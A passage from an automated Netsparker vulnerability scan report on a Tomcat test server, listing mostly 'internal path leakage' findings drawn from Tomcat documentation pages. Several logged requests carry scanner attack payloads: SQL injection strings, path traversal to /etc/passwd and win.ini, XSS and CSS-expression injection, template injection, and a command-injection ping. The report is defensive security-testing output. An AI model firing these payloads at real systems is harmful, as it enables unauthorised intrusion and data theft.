RequestGET /docs/setup.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…nately, when calling the <code>./configure</code> script, the path of the JDK may be specified using the <code>--with-java</code> parameter, such as <code>./configure --with-java=/usr/java</code>.</p> <p>Using the following commands should result in a compiled jsvc binary, located in the <code>$CATALINA_HOME/bin</code> folder. This assumes that GNU TARis used, and t…tr><tr><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre> cd$CATALINA_HOME ./bin/jsvc -cp ./bin/bootstrap.jar \ -outfile ./logs/catalina.out -errfile ./logs/catalina.err \ org.apache.catalina.startup.Bootstrap</pre></td><td width="1"bgcolor="#023264"><img border="0" hspace="0" vspace="0" he…ode> will return the full jsvc usage information. In particular, the <code>-debug</code> option is useful to debug issues running jsvc.</p> <p>The file <code>$CATALINA_HOME/bin/commons-daemon-1.0.x-native-src/unix/native/Tomcat5.sh </code> can be used as a template for starting Tomcat automatically at boot time from<code>/etc/init.d</code>. The file is currently setup for running Tomcat 5.5.x, so it will be necessary to edit it a little.</p> <p>Note that the Commons-Daemon JAR file must be onyour runtime classpath …
16.13. /docs/jndi-datasource-examples-howto.htmlhttp://161.74.91.78:8080/docs/jndi-datasource-examples-howto.html
Identified Internal Path(s)/lib/tomcat-dbcp.jar
Certainty
RequestGET /docs/jndi-datasource-examples-howto.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…g/">Apache Commons</a> project.The following libraries are used:</p><ul><li>Commons DBCP</li><li>Commons Pool</li></ul><p>These libraries are located in a single JAR at<code>$CATALINA_HOME/lib/tomcat-dbcp.jar</code>. However,only the classes needed for connection pooling have been included, and thepackages have been renamed to avoid interferingwith applications.</p><p>DBCP 1.3 provides support for J…
16.14. /docs/virtual-hosting-howto.htmlhttp://161.74.91.78:8080/docs/virtual-hosting-howto.html
Identified Internal Path(s)/usr/local/tomcat
Certainty
RequestGET /docs/virtual-hosting-howto.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…host names, <code>ren</code> and <code>stimpy</code>. Let's also assume one instance of Tomcat running, so <code>$CATALINA_HOME</code> refers to wherever it's installed, perhaps<code>/usr/local/tomcat</code>. </p> <p> Also, this how-to uses Unix-style path separators and commands; if you're on Windows modify accordingly. </p> </blockquote></td></tr></table><table cellpad…
16.15. /docs/config/listeners.htmlhttp://161.74.91.78:8080/docs/config/listeners.html
Identified Internal Path(s)/dev/urandom
26 / 35
Certainty
RequestGET /docs/config/listeners.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/jndi-datasource-examples-howto.htmlAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…center" align="left"> <p>Entropy source used to seed the SSLEngine's PRNG. The default value is <code>builtin</code>. On development systems, you may want to set this to<code>/dev/urandom</code> to allow quicker start times.</p> </td></tr></table> </blockquote></td></tr></table> <table cellpadding="2" cellspacing="0" border="0"><tr><tdbgcolor="#828DA6"><font face="arial,h…
16.16. /docs/cluster-howto.htmlhttp://161.74.91.78:8080/docs/cluster-howto.html
Identified Internal Path(s)/tmp/war-temp//tmp/war-deploy//tmp/war-listen/
Certainty
RequestGET /docs/cluster-howto.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…<Valve className="org.apache.catalina.ha.session.JvmRouteBinderValve"/> <Deployer className="org.apache.catalina.ha.deploy.FarmWarDeployer" tempDir="/tmp/war-temp/"deployDir="/tmp/war-deploy/" watchDir="/tmp/war-listen/" watchEnabled="false"/> <ClusterListenerclassName="org.apache.catalina.ha.session.JvmRouteSessionIDBinderListener"/> <ClusterListener className="…filter=".*\.gif;.*\.js;.*\.jpg;.*\.png;.*\.htm;.*\.html;.*\.css;.*\.txt;"/> <Deployer className="org.apache.catalina.ha.deploy.FarmWarDeployer" tempDir="/tmp/war-temp/"deployDir="/tmp/war-deploy/" watchDir="/tmp/war-listen/" watchEnabled="false"/> <ClusterListener className="org.apache.catalina.ha.session.ClusterSessionListener"/></Cluster> </pre></td><td width=…="1" width="1" alt="" src="./images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre> <Deployer className="org.apache.catalina.ha.deploy.FarmWarDeployer" tempDir="/tmp/war-temp/" deployDir="/tmp/war-deploy/" watchDir="/tmp/war-listen/" watchEnabled="false"/> </pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1"width="1" alt="" src="./images/void.gif"></td></tr><tr><…
16.17. /docs/class-loader-howto.htmlhttp://161.74.91.78:8080/docs/class-loader-howto.html
Identified Internal Path(s)/lib/ext/bin/catalina.sh/bin/bootstrap.jar/bin/tomcat-juli.jar/bin/commons-daemon.jar
Certainty
RequestGET /docs/class-loader-howto.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
27 / 35
Response…This class loader contains the basic runtime classes provided by the Java Virtual Machine, plus any classes from JAR files present in the System Extensions directory(<code>$JAVA_HOME/jre/lib/ext</code>). <em>Note</em>: some JVMs may implement this as more than one class loader, or it may not be visible (as a class loader) at all.</p></li><li><p><strong>System</strong> — This …ATH</code> environment variable. All such classes are visible to both Tomcat internal classes, and to web applications. However, the standard Tomcat startup scripts(<code>$CATALINA_HOME/bin/catalina.sh</code> or <code>%CATALINA_HOME%\bin\catalina.bat</code>) totally ignore the contents of the <code>CLASSPATH</code> environment variable itself,and instead build the System class loader from the following repositories: </p> <ul> <li><p><em>$CATALINA_HOME/bin/bootstrap.jar</em> — Contains the main() method that is usedto initialize the Tomcat server, and the class loader implementation classes it depends on.</p></li> <li><p><em>$CATALINA_BASE/bin/tomcat-juli.jar</em> and<em>$CATALINA_HOME/bin/tomcat-juli.jar</em> — Logging implementation classes. These include enhancement classes to <code>java.util.logging</code> API, known as Tomcat JULI,and a package-renamed copy of Apache Commons Logging library used internally by Tomcat. See <a href="logging.html">logging documentation</a> for more details.</p></li> <li><p><em>$CATALINA_HOME/bin/commons-daemon.jar</em> — The classes from <a href="http://commons.apache.org/daemon/">Apache Commons Daemon</a> project.</p></li> </ul> <p>The<em>tomcat-juli.jar</em> and <em>commons-dae….sh</code> scripts, but are referenced from the manifest file of <em>bootstrap.jar</em>. </p> <p>If <em>$CATALINA_BASE</em> and <em>$CATALINA_HOME</em> do differ and<em>$CATALINA_BASE/bin/tomcat-juli.jar</em> does exist, the startup scripts will add it to <code>CLASSPATH</code> before <em>bootstrap.jar</em>, so that Java will look into<em>$CATALINA_BASE/bin/tomcat-juli.jar</em> for classes before it will look into <em>$CATALINA_HOME/bin/tomcat-juli.jar</em> referenced by <em>bootstrap.jar</em>. It should work inmost cases but, if you are using such configuration, it might be recommended to remove <em>tomcat-juli.jar</em> from <em>$CATA…
16.18. /examples/jsp/sessions/carts.jsphttp://161.74.91.78:8080/examples/jsp/sessions/carts.jsp?item=Beavis+%26+Butt-head+Video+collection%..
Identified Internal Path(s)/etc/httpd/logs/error.log
Certainty
RequestGET /examples/jsp/sessions/carts.jsp?item=Beavis+%26+Butt-head+Video+collection%0a&submit=body%7Bx:expression(netsparker(0x00054B))%7D HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/examples/jsp/sessions/carts.htmlAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Cookie: JSESSIONID=8CFCC592DC40DA02412C5EFC1A18A784; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=trueAccept-Encoding: gzip, deflate
Response…AR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' <li>../../../../../../../../../../etc/httpd/logs/error.log </ol></FONT><hr><html><!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements.See the NOTICE file distributed with this work for addition…
16.19. /docs/monitoring.htmlhttp://161.74.91.78:8080/docs/monitoring.html
Identified Internal Path(s)/bin/catalina-tasks.xml
Certainty
RequestGET /docs/monitoring.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…</echo> </target> </project> </pre></p> </td></tr></table> <p><b>import:</b> Import the JMX Accessor Project with <em><importfile="${CATALINA.HOME}/bin/catalina-tasks.xml" /></em> and reference the tasks with <em>jmxOpen</em>, <em>jmxSet</em>, <em>jmxGet</em>, <em>jmxQuery</em>, <em>jmxInvoke</em>,<em>jmxEquals</em> and <em>jmxCondition</em>. </p> </block…
16.20. /docs/config/cluster-sender.htmlhttp://161.74.91.78:8080/docs/config/cluster-sender.html
Identified Internal Path(s)/net/Socket.html#setTrafficClass(int
Certainty
28 / 35
RequestGET /docs/config/cluster-sender.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/cluster-howto.htmlAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…value is between 0 and 255. Default value is <code>int soTrafficClass = 0x04 | 0x08 | 0x010;</code> Different values are defined in <ahref="http://java.sun.com/j2se/1.5.0/docs/api/java/net/Socket.html#setTrafficClass(int)"> java.net.Socket#setTrafficClass(int)</a>. </td></tr><tr><td valign="center" align="left"><code>tcpNoDelay</code></td><td valign="center" align="left"> Boolean value for the soc…
16.21. /docs/logging.htmlhttp://161.74.91.78:8080/docs/logging.html
Identified Internal Path(s)/lib/logging.properties/bin/tomcat-juli.jar
Certainty
RequestGET /docs/logging.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…va.util.logging.config.file</code> System property which is set by the startup scripts. If it is not readable or is not configured, the default is to use the<code>${java.home}/lib/logging.properties</code> file in the JRE. </li> <li>In the web application. The file will be <code>WEB-INF/classes/logging.properties</code> </li> </ul> </p><p> The default <code…<li>Put <code>log4j.jar</code> and <code>tomcat-juli-adapters.jar</code> from "extras" into <code>$CATALINA_HOME/lib</code>.</li> <li>Replace <code>$CATALINA_HOME/bin/tomcat-juli.jar</code> with <code>tomcat-juli.jar</code> from "extras".</li> </ul> </li> <li><p>If you are running Tomcat with separate $CATALINA_HOME and $CATALINA_BASE an…code>tomcat-juli-adapters.jar</code> from "extras" into <code>$CATALINA_BASE/lib</code></li> <li>Put <code>tomcat-juli.jar</code> from "extras" as <code>$CATALINA_BASE/bin/tomcat-juli.jar</code></li> <li>If you are running with a <a href="security-manager-howto.html">security manager</a>, you would need to edit the <code>$CATALINA_BASE/conf/cata…s still referenced by manifest of <code>bootstrap.jar</code> and thus will be implicitly present on Tomcat's classpath. The startup scripts configure<code>$CATALINA_BASE/bin/tomcat-juli.jar</code> to be earlier on the classpath than <code>bootstrap.jar</code>, and so it should have higher priority. Thus it should be OK, butconsider removing the unneeded co…
16.22. /docs/config/http.htmlhttp://161.74.91.78:8080/docs/config/http.html
Identified Internal Path(s)/net/Socket.html#setPerformancePreferences(int,
Certainty
RequestGET /docs/config/http.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/ssl-howto.htmlAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…tionTime</code></td><td valign="center" align="left"> <p>(int)The first value for the performance settings. Default is <code>1</code>, see <ahref="http://java.sun.com/j2se/1.5.0/docs/api/java/net/Socket.html#setPerformancePreferences(int,%20int,%20int)">Socket Performance Options</a></p> </td></tr><tr><td valign="center"align="left"><code>socket.performanceLatency</code></td><td valign="center" align="left"> <p>(int)The second value for the performance settings. Default is <code>0</code>, see <ahref="http://java.sun.com/j2se/1.5.0/docs/api/java/net/Socket.html#setPerformancePreferences(int,%20int,%20int)">Socket Performance Options</a></p> </td></tr><tr><td valign="center"align="left"><code>socket.performanceBandwidth</code></td><td valign="center" align="left"> <p>(int)The third value for the performance settings. Default is <code>1</code>, see <ahref="http://java.sun.com/j2se/1.5.0/docs/api/java/net/Socket.html#setPerformancePreferences(int,%20int,%20int)">Socket Performance Options</a></p> </td></tr><tr><td valign="center"align="left"><code>selectorPool.maxSelectors</code></td><td valign="center" align="left"> <p>(int)The…
16.23. /examples/servlets/servlet/SessionExamplehttp://161.74.91.78:8080/examples/servlets/servlet/SessionExample
29 / 35
Identified Internal Path(s)/etc/httpd/logs/error.log
Certainty
RequestPOST /examples/servlets/servlet/SessionExample HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/examples/servlets/servlet/SessionExampleAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Cookie: hTTp://netsparker.com/n=3; NSFTW=3; //netsparker.com/n/n.css?0x00098A=3; http://netsparker.com/n?.php=3; ns:netsparker056650=vuln=3;/../../../../../../../../../../../etc/passwd=3; #{28274*28274-(13)}=3; netsparker.com/n=3; /etc/passwd=3; '+NSFTW+'=3; javascript:netsparker(0x00098D)=3; CookieExample=3;/examples/servlets/servlet/CookieExample=3; <script>ns(0x0009A8)</script>=3; /servlets/servlet/CookieExample=3; /servlet/CookieExample=3; body{x:expression(netsparker(0x0009BB))}=3;$Version=1; Smith="'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'";JSESSIONID=8CFCC592DC40DA02412C5EFC1A18A784; CHAR(109)=Accept-Encoding: gzip, deflateContent-Length: 209Content-Type: application/x-www-form-urlencoded
dataname=Smith&datavalue='%2b%20(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)%20%2b'
Response…CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) = 3<br>expr 268409241 - 2 & = bar<br>../../../../../../../../../../etc/httpd/logs/error.log = bar<br>'{${print(int)0xFFF9999-22}}' = bar<br><script>ns(0x000998)</script> = bar<br>1;WAITFOR DELAY '0:0:25'-- = bar<br>';WAITFOR DELAY '0:0:25'-- = bar<br>netsparker(0x0009…
16.24. /examples/servlets/servlet/RequestHeaderExamplehttp://161.74.91.78:8080/examples/servlets/servlet/RequestHeaderExample
Identified Internal Path(s)/etc/passwd
Certainty
RequestGET /examples/servlets/servlet/RequestHeaderExample HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/examples/servlets/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Cookie: //netsparker.com/n/n.css?0x00098A=3; http://netsparker.com/n?.php=3; ns:netsparker056650=vuln=3; /../../../../../../../../../../../etc/passwd=3; #{28274*28274-(13)}=3;netsparker.com/n=3; /etc/passwd=3; '+NSFTW+'=3; javascript:netsparker(0x00098D)=3; CookieExample=3; /examples/servlets/servlet/CookieExample=3; <script>ns(0x0009A8)</script>=3;/servlets/servlet/CookieExample=3; /servlet/CookieExample=3; body{x:expression(netsparker(0x0009BB))}=3; '+netsparker(0x0009BE)+'=3; "+netsparker(0x0009C0)+"=3; $Version=1; Smith="netsparker(0x0009D9) "; JSESSIONID=7AF9251B247E1F37635C69CF62872A4A; CHAR(109)=Accept-Encoding: gzip, deflate
30 / 35
ResponseHTTP/1.1 200 OKDate: Fri, 25 Jan 2013 11:28:06 GMTServer: Apache-Coyote/1.1Content-Length: 1830Content-Type: text/html
<html><body bgcolor="white"><head><title>Request Header Example</title></head><body><a href="../reqheaders.html"><img src="../images/code.gif" height=24 width=24 align=right border=0 alt="view code"></a><a href="../index.html"><img src="../images/return.gif" height=24 width=24 align=right border=0 alt="return"></a><h3>Request Header Example</h3><table border=0><tr><td bgcolor="#CCCCCC">referer</td><td>http://161.74.91.78:8080/examples/servlets/</td></tr><tr><td bgcolor="#CCCCCC">accept</td><td>text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5</td></tr><tr><td bgcolor="#CCCCCC">user-agent</td><td>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)</td></tr><tr><td bgcolor="#CCCCCC">cache-control</td><td>no-cache</td></tr><tr><td bgcolor="#CCCCCC">accept-language</td><td>en-us,en;q=0.5</td></tr><tr><td bgcolor="#CCCCCC">host</td><td>161.74.91.78:8080</td></tr><tr><td bgcolor="#CCCCCC">cookie</td><td>//netsparker.com/n/n.css?0x00098A=3; http://netsparker.com/n?.php=3; ns:netsparker056650=vuln=3; /../../../../../../../../../../../etc/passwd=3; #{28274*28274-(13)}=3;netsparker.com/n=3; /etc/passwd=3; '+NSFTW+'=3; javascript:netsparker(0x00098D)=3; CookieExample=3; /examples/servlets/servlet/CookieExample=3;<script>ns(0x0009A8)</script>=3; /servlets/servlet/CookieExample=3; /servlet/CookieExample=3; body{x:expression(netsparker(0x0009BB))}=3; '+netsparker(0x0009BE)+'=3;"+netsparker(0x0009C0)+"=3; $Version=1; Smith=" netsparker(0x0009D9) "; JSESSIONID=7AF9251B247E1F37635C69CF62872A4A; CHAR(109)=</td></tr><tr><td bgcolor="#CCCCCC">accept-encoding</td><td>gzip, deflate</td></tr></table>
16.25. /docs/config/cluster-receiver.htmlhttp://161.74.91.78:8080/docs/config/cluster-receiver.html
Identified Internal Path(s)/net/Socket.html#setTrafficClass(int
Certainty
RequestGET /docs/config/cluster-receiver.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/cluster-howto.htmlAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…lign="center" align="left"> Sets the traffic class level for the socket, the value is between 0 and 255. Different values are defined in <ahref="http://java.sun.com/j2se/1.5.0/docs/api/java/net/Socket.html#setTrafficClass(int)"> java.net.Socket#setTrafficClass(int)</a>. </td></tr><tr><td valign="center" align="left"><code>tcpNoDelay</code></td><td valign="center" align="left"> Boolean value for the socket TC…
31 / 35
7 TOTALINFORMATION
17. [Possible] Internal Path Leakage (Windows)Netsparkeridentifiedaninternalpathinthedocument.
ImpactThereisnodirectimpacthoweverthisinformationcanhelpanattackereithertoidentifyothervulnerabilitiesorduringtheexploitationofotheridentifiedvulnerabilities.
RemedyFirstensurethatthisisnotafalsepositive.Duetothenatureoftheissue.Netsparkercouldnotconfirmthatthisfilepathwasactuallytherealfilepathofthetargetwebserver.
Errormessagesshouldbedisabled.Removethiskindofsensitivedatafromtheoutput.
External ReferencesOWASP-FullPathDisclosure
ClassificationPCIv1.2-6.5.6CWE-200CAPEC-118WASC-13
17.1. /docs/html-manager-howto.htmlhttp://161.74.91.78:8080/docs/html-manager-howto.html
Identified Internal Path(s)C:\path\to\fooC:/path/to/fooC:\path\to\application\foobarC:/path/to/context.xml
Certainty
RequestGET /docs/html-manager-howto.html HTTP/1.1Cache-Control: no-cacheAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…on the Javadocspage for the <code>java.net.JarURLConnection</code> class. Use only URLs thatrefer to the entire WAR file.</p><p>In this example the web application located in thedirectory<code>C:\path\to\foo</code> on the Tomcat server (running on Windows)is deployed as the web application context named <code>/footoo</code>.</p><div align="left"><tableborder="0" cellpadding="0" cellspacing="4"><tr><td…gcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre>Context Path: /footooWAR orDirectory URL: file:C:/path/to/foo</pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td></tr><tr><td height="1" width="1" bgcolor="#023264"><img bord…d width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre><Contextpath="/foobar" docBase="C:\path\to\application\foobar"> <!-- Link to the user database we will get roles from --> <ResourceLink name="users" global="UserDatabase"type="org.apache.catalina.UserDatabase"/></Contex…><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre>XMLConfiguration file URL: file:C:/path/to/context.xml</pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt=""src="./images/void.gif"></td></tr><tr><td height="1" width="1" bgcolor="#023264"><img bord…
17.2. /examples/servlets/servlet/SessionExamplehttp://161.74.91.78:8080/examples/servlets/servlet/SessionExample?dataname=response.write(268409241-..
Identified Internal Path(s)c:\windows\win.ini
Certainty
32 / 35
RequestGET /examples/servlets/servlet/SessionExample?dataname=response.write(268409241-22)%27&datavalue=bar HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/examples/servlets/servlet/SessionExampleAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Cookie: %27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000980%29%3C%2Fscript%3E=3; hTTp://netsparker.com/n=3; NSFTW=3; //netsparker.com/n/n.css?0x00098A=3;http://netsparker.com/n?.php=3; ns:netsparker056650=vuln=3; /../../../../../../../../../../../etc/passwd=3; #{28274*28274-(13)}=3; netsparker.com/n=3; /etc/passwd=3; '+NSFTW+'=3;javascript:netsparker(0x00098D)=3; CookieExample=3; /examples/servlets/servlet/CookieExample=3; <script>ns(0x0009A8)</script>=3; /servlets/servlet/CookieExample=3;/servlet/CookieExample=3; $Version=1; Smith="netsparker.com/n"; JSESSIONID=8CFCC592DC40DA02412C5EFC1A18A784Accept-Encoding: gzip, deflate
Response…FF9999-2 & = bar<br>1 ns=netsparker(0x000993) = bar<br>'" ns= netsparker(0x000992) = bar<br>'+netsparker(0x00099D)+' = bar<br>netsparker(0x0009A0) = bar<br>theTruth = true<br>c:\windows\win.ini = bar<br>php://filter//resource=http://netsparker.com/n?.php = bar<br>ping -c 26 127.0.0.1 = bar<br>http://netsparker.com/n?.php = bar<br>1 + (select dbms_pipe.receive_message((chr(95)||chr…
17.3. /docs/windows-service-howto.htmlhttp://161.74.91.78:8080/docs/windows-service-howto.html
Identified Internal Path(s)C:\Program Files\Tomcat\bin\tomcat6.exe
Certainty
RequestGET /docs/windows-service-howto.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/setup.htmlAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…h="1" alt="" src="./images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre>Install the service named 'Tomcat6'C:\> tomcat6 //IS//Tomcat6 --DisplayName="Apache Tomcat 6"\C:\> --Install="C:\Program Files\Tomcat\bin\tomcat6.exe" --Jvm=auto \C:\> --StartMode=jvm --StopMode=jvm \C:\> --StartClass=org.apache.catalina.startup.Bootstrap --StartParams=start \C:\> --StopClass=org.apache.catalina.startup.Bootstrap --Sto…
17.4. /docs/building.htmlhttp://161.74.91.78:8080/docs/building.html
Identified Internal Path(s)C:\usr\share\java
Certainty
RequestGET /docs/building.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…system, an ordinary user will not have access to write to this directory, and, even if you do, it may not be appropriate for you to write there. On Windows this usually correspondsto the <code>C:\usr\share\java</code> directory, unless Cygwin is used. Read below to learn how to customize the directory used to download the binaries.</p><p><b>NOTE:</b> Usersaccessing the Internet through a proxy must…
17.5. /docs/config/host.htmlhttp://161.74.91.78:8080/docs/config/host.html
Identified Internal Path(s)33 / 35
c:\Homes
Certainty
RequestGET /docs/config/host.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/realm-howto.htmlAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
